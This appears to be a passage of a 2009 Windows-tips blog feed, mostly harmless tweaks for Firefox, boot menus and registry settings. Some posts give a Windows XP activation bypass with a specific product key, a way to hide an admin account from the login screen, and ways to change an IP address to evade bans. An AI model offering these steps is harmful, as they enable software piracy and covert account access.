href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1154157241048521573'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-make-scary-pop-up.html' title='How To Make A Scary Pop-up'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1539072315314260112</id><published>2009-11-29T06:59:00.001-08:00</published><updated>2009-11-29T06:59:27.848-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><title type='text'>How to remove Windows Vista and/or Windows 7 from dual boot system having XP.</title><content type='html'>I was having my P.C. with X.P. as well Windows Vista and Beta version of Windows 7 as a dual boot.&lt;br /&gt;After some days if uses I stopped using Vista and Windows 7.&lt;br /&gt;Now I wished to get rid of these Operating systems as they were using a lot of space on my Hard Disk and I did not needed them any more.&lt;br /&gt;Then I searched for the solution of How to remove those Operating Systems without losing my Data and even without having to re-install my X.P.?&lt;br /&gt;I think many of you people also have this problem of how to remove Vista and / or Windows 7 on a dual boot system with X.P.&lt;br /&gt;&lt;br /&gt;Here is how to do it.&lt;br /&gt;&lt;br /&gt;1&gt; Boot your computer in to Windows XP.&lt;br /&gt;&lt;br /&gt;2&gt; Ensure you have the Vista DVD in the DVD drive.&lt;br /&gt;&lt;br /&gt;3&gt; Go to “Start” and “Run”. Type in “d:\boot\bootsect.exe /nt52 ALL /force” (without quotes, plus replace d: with the drive letter of your Vista DVD).&lt;br /&gt;&lt;br /&gt;4&gt; Remove two files (Boot.BAK &amp; Bootsect.BAK) on your XP root folder (C: ).&lt;br /&gt;&lt;br /&gt;5&gt; Restart the computer, and you will notice the boot selection menu is gone.&lt;br /&gt;&lt;br /&gt;6&gt; Format the partition/drive where you had Vista installed.&lt;br /&gt;&lt;br /&gt;And now you have returned your computer to its previous state, without Vista and without the new bootloader. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is this much simple.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1539072315314260112?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1539072315314260112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-remove-windows-vista-andor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1539072315314260112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1539072315314260112'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-remove-windows-vista-andor.html' title='How to remove Windows Vista and/or Windows 7 from dual boot system having XP.'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6115552026345284171</id><published>2009-11-29T06:58:00.005-08:00</published><updated>2009-11-29T06:58:46.207-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>cool mouse ticks!</title><content type='html'>Moving the pointer without a mouse!&lt;br /&gt;Ever thought that you could move your mouse pointer without your mouse? No, not really, isn’t it? But, it’s possible!&lt;br /&gt;&lt;br /&gt;Here is how:&lt;br /&gt;&lt;br /&gt;1.Press Left Alt + Left Shift + Num Lock Button and click OK in the dialogue box that appears.&lt;br /&gt;&lt;br /&gt;2.In your Taskbar, a mouse-like icon will appear. Double click it and under “Mouse” tab, make sure that the “Use Mouse Keys” is checked.&lt;br /&gt;&lt;br /&gt;3.Also ensure that the Num Lock is ON (ie. the light must glow).&lt;br /&gt;&lt;br /&gt;2.Now with the help of Numeric Keypad e.g ( Press and Hold the following Keys )&lt;br /&gt;&lt;br /&gt;7 8 9&lt;br /&gt;&lt;br /&gt;4 6&lt;br /&gt;&lt;br /&gt;1 2 3&lt;br /&gt;&lt;br /&gt;For normal click, press 5&lt;br /&gt;&lt;br /&gt;Interesting, isn’t it? You can also change settings under the “Mouse” tab in “Accessiblity Options”, by clicking on “Settings&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6115552026345284171?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6115552026345284171/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/cool-mouse-ticks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6115552026345284171'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6115552026345284171'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/cool-mouse-ticks.html' title='cool mouse ticks!'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1367795540282764361</id><published>2009-11-29T06:58:00.001-08:00</published><updated>2009-11-29T06:58:16.522-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>URL Shortening via Gmail</title><content type='html'>There are some URL shortening services such as TinyUrl and Bit&lt;br /&gt;&lt;br /&gt;ALso there is a way to shorten your URL through Gmail from char Option...&lt;br /&gt;&lt;br /&gt;Go to Your Gmail Account&lt;br /&gt;&lt;br /&gt;Add &lt;br /&gt;Quote:&lt;br /&gt;urlataskme.im  &lt;br /&gt;&lt;br /&gt;replace at by @ to your gmail Contacts..&lt;br /&gt;&lt;br /&gt;Just type the URL you need to shorten in chat section...&lt;br /&gt;&lt;br /&gt;It gets Shortened automatically&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1367795540282764361?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1367795540282764361/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/url-shortening-via-gmail.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1367795540282764361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1367795540282764361'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/url-shortening-via-gmail.html' title='URL Shortening via Gmail'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8384833341454740476</id><published>2009-11-29T06:57:00.001-08:00</published><updated>2009-11-29T06:57:39.492-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><title type='text'>Make ur xp genuine in one line steps(no software needed works 100%)</title><content type='html'>1.Goto "start"&lt;br /&gt;2.Run-type in "regedit"&lt;br /&gt;3.Goto "local-machine-software-microsoft-window s nt-current version-wpaevents"&lt;br /&gt;4.choose "oobe timer" in the rights panel&lt;br /&gt;5.in the window,delete all the things.&lt;br /&gt;6.close regedit&lt;br /&gt;7.goto start-run-type in "%systemroot%\system32\oobe\msoobe.exe /a"&lt;br /&gt;8.choose the second option "use phone to activate"&lt;br /&gt;9.click "change product key"&lt;br /&gt;10.type in the serial:thmpv-77d6f-94376-8hgkg-vrdrq&lt;br /&gt;11.click "update"&lt;br /&gt;12.click"remember later"&lt;br /&gt;13.after that restart the computer&lt;br /&gt;14.after restart goto start-run-type in "%systemroot%\system32\oobe\msoobe.exe /a"&lt;br /&gt;15.it should come up with a message"windows activated"-finished!&lt;br /&gt;&lt;br /&gt;It was tested &amp; it works 100 % Only For Windows XP&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8384833341454740476?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8384833341454740476/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-ur-xp-genuine-in-one-line-stepsno.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8384833341454740476'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8384833341454740476'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/make-ur-xp-genuine-in-one-line-stepsno.html' title='Make ur xp genuine in one line steps(no software needed works 100%)'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3299292350672485181</id><published>2009-11-29T06:56:00.003-08:00</published><updated>2009-11-29T06:56:41.154-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Disable Splash Screen From Your System</title><content type='html'>Through the following steps you can Disable your Splash Screen Really 100% working&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Go in Start Menu&lt;br /&gt;2. Click on Run&lt;br /&gt;3.Type Msconfig&lt;br /&gt;4. Check /NOGUIBOOT and then press ok&lt;br /&gt;5.Restart your System.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3299292350672485181?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3299292350672485181/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-splash-screen-from-your-system.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3299292350672485181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3299292350672485181'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-splash-screen-from-your-system.html' title='Disable Splash Screen From Your System'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8090502896166487782</id><published>2009-11-29T06:56:00.001-08:00</published><updated>2009-11-29T06:56:16.535-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Hacks To Make Firefox Ridiculously Fast</title><content type='html'>Firefox has been outperforming IE in every department for years, and version 3 is speedier than ever.&lt;br /&gt;&lt;br /&gt;But tweak the right settings and you could make it faster still, more than doubling your speed in some situations, all for about five minutes work and for the cost of precisely nothing at all. Here's what you need to do.&lt;br /&gt;&lt;br /&gt;Enable pipelining&lt;br /&gt;Browsers are normally very polite, sending a request to a server then waiting for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.&lt;br /&gt;&lt;br /&gt;Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Render quickly&lt;br /&gt;Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.&lt;br /&gt;&lt;br /&gt;Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New &gt; Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.&lt;br /&gt;&lt;br /&gt;Right-click again in the window and select New &gt; Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Faster loading&lt;br /&gt;If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.&lt;br /&gt;&lt;br /&gt;Type about:config and press [Enter], right-click in the window and select New &gt; Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. No interruptions&lt;br /&gt;You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.&lt;br /&gt;&lt;br /&gt;Type about:config, press [Enter], right-click in the window and select New &gt; Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Block Flash&lt;br /&gt;Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Increase the cache size&lt;br /&gt;As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New &gt; Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Enable TraceMonkey&lt;br /&gt;TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.&lt;br /&gt;Install the latest nightly build (&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Compress data&lt;br /&gt;If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8090502896166487782?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8090502896166487782/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/hacks-to-make-firefox-ridiculously-fast.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8090502896166487782'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8090502896166487782'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/hacks-to-make-firefox-ridiculously-fast.html' title='Hacks To Make Firefox Ridiculously Fast'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2789772664242937506</id><published>2009-11-29T06:55:00.001-08:00</published><updated>2009-11-29T06:55:22.420-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Create Hidden Admin Account in XP</title><content type='html'>Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.&lt;br /&gt;&lt;br /&gt;After you have Backed up your registry follow the Steps to Create your Hidden Account:&lt;br /&gt;&lt;br /&gt;* First Goto Start -&gt; Run -&gt; Type regedit -&gt; Enter&lt;br /&gt;* In the Left Menu goto,&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrentVersion\Winlogon\SpecialAccounts\UserList&lt;br /&gt;&lt;br /&gt;* In the Right pane, Right click -&gt; New -&gt; String Value&lt;br /&gt;* Right click on the new String Value and click Rename&lt;br /&gt;* Type the Name of the Account you want to hide.&lt;br /&gt;* Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.&lt;br /&gt;* Now Save and Exit the Registry and Logoff.&lt;br /&gt;* Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt&lt;br /&gt;* Type hidden Accounts name and password&lt;br /&gt;* Enjoy!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2789772664242937506?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2789772664242937506/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-hidden-admin-account-in-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2789772664242937506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2789772664242937506'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-hidden-admin-account-in-xp.html' title='Create Hidden Admin Account in XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3473978448799143024</id><published>2009-11-29T06:54:00.003-08:00</published><updated>2009-11-29T06:54:51.674-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>How to change IPs</title><content type='html'>This is a tutorial about changing IP addresses. You can change your IP address for various reasons&lt;br /&gt;&lt;br /&gt;1.) because you got banned in a game from some server.&lt;br /&gt;&lt;br /&gt;2.) you got banned from some crappy forums and want to get a nub back&lt;br /&gt;&lt;br /&gt;3.) if you are downloading from somewhere like Rapidshare, you might not have patience to wait for 3 hours to download another file again, if you change your ip, you can download another file instantly having to still wait for your "ticket" tho.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok there are many ways of changing your IP &lt;br /&gt;&lt;br /&gt;First is to go to the Start Menu and goto the RUN command.&lt;br /&gt;&lt;br /&gt;after that type this:&lt;br /&gt;&lt;br /&gt;blah blah blah&gt;ipconfig&lt;br /&gt;&lt;br /&gt;now see what your ip address is right NOW.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now you need to:&lt;br /&gt;blah blah blah&gt; ipconfig [SPACE ONCE] /release&lt;br /&gt;(Note:this releases the IP address you are using now, and your internet wont work till u renew another IP address or the same one)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;then like after 10-20 seconds do:&lt;br /&gt;blah blah blah&gt;ipconfig [SPACE ONCE] /renew&lt;br /&gt;this gives you an iP address,either another one, or the same one you had before&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;that is one way of changing your IP Wink, note that it won't work all the time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now if you don't like all that technical stuff, then here is an easier way.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you have a ROUTER, this is gonna be ownage.&lt;br /&gt;&lt;br /&gt;Unplug your router power, and after that your DSL pwoer cable, wait for 10 seconds until your internet icon at the taskbar has an X with it.&lt;br /&gt;&lt;br /&gt;now plug back your router in, then after 1 second of plugging your router in, plug that dsl of yours in.&lt;br /&gt;&lt;br /&gt;When you are connected to the internet, try getting a file from rapidshare, and see if you can download.&lt;br /&gt;&lt;br /&gt;If u can download, then congratulations, you have just changed your IP address&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(Note again: sooner or later, you will run out of IP addresses to change,but that will take a long time for it to happen)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3473978448799143024?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3473978448799143024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-change-ips.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3473978448799143024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3473978448799143024'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-change-ips.html' title='How to change IPs'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1741362204576790794</id><published>2009-11-29T06:54:00.001-08:00</published><updated>2009-11-29T06:54:08.595-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Enabling right click on sites that disable it !</title><content type='html'>This is a tip on how to Enable right click function on sites that disable it.&lt;br /&gt;&lt;br /&gt;Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click-&gt;save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.&lt;br /&gt;&lt;br /&gt;The solution is simple, just get used to right clicking and hitting the Esc "Escape" Key "NOT at the same time but very close to it" right click first then Esc. Until you are allowed access to the context menu to copy/save the file/photo.... Sometimes it takes a couple of tries but with practice comes perfection.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1741362204576790794?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1741362204576790794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/enabling-right-click-on-sites-that_29.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1741362204576790794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1741362204576790794'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/enabling-right-click-on-sites-that_29.html' title='Enabling right click on sites that disable it !'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4137719983179830918</id><published>2009-11-29T06:51:00.003-08:00</published><updated>2009-11-29T06:51:35.028-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Disabling the low disk-space balloon tip</title><content type='html'>When the disk space drops to a very low level, Windows displays a low disk space warning as a balloon tip from the system tray. If this is undesirable, it can be disabled using the tweak below:&lt;br /&gt;&lt;br /&gt;To disable the low disk-space balloon tip:&lt;br /&gt;&lt;br /&gt;* Use a registry editing tool to navigate to the following key:&lt;br /&gt;&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer&lt;br /&gt;&lt;br /&gt;* Insert a value with the following details:&lt;br /&gt;&lt;br /&gt;Data Type: DWORD&lt;br /&gt;Value Name: NoLowDiskSpaceChecks&lt;br /&gt;Value: 1&lt;br /&gt;* Reboot your machine for the change to take effect&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4137719983179830918?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4137719983179830918/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/disabling-low-disk-space-balloon-tip.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4137719983179830918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4137719983179830918'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/disabling-low-disk-space-balloon-tip.html' title='Disabling the low disk-space balloon tip'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2393499843583883005</id><published>2009-11-29T06:51:00.001-08:00</published><updated>2009-11-29T06:51:01.660-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Hack IE Title Bar</title><content type='html'>This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to &lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string "Window Title" to whatever you wish.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2393499843583883005?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2393499843583883005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/hack-ie-title-bar.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2393499843583883005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2393499843583883005'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/hack-ie-title-bar.html' title='Hack IE Title Bar'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 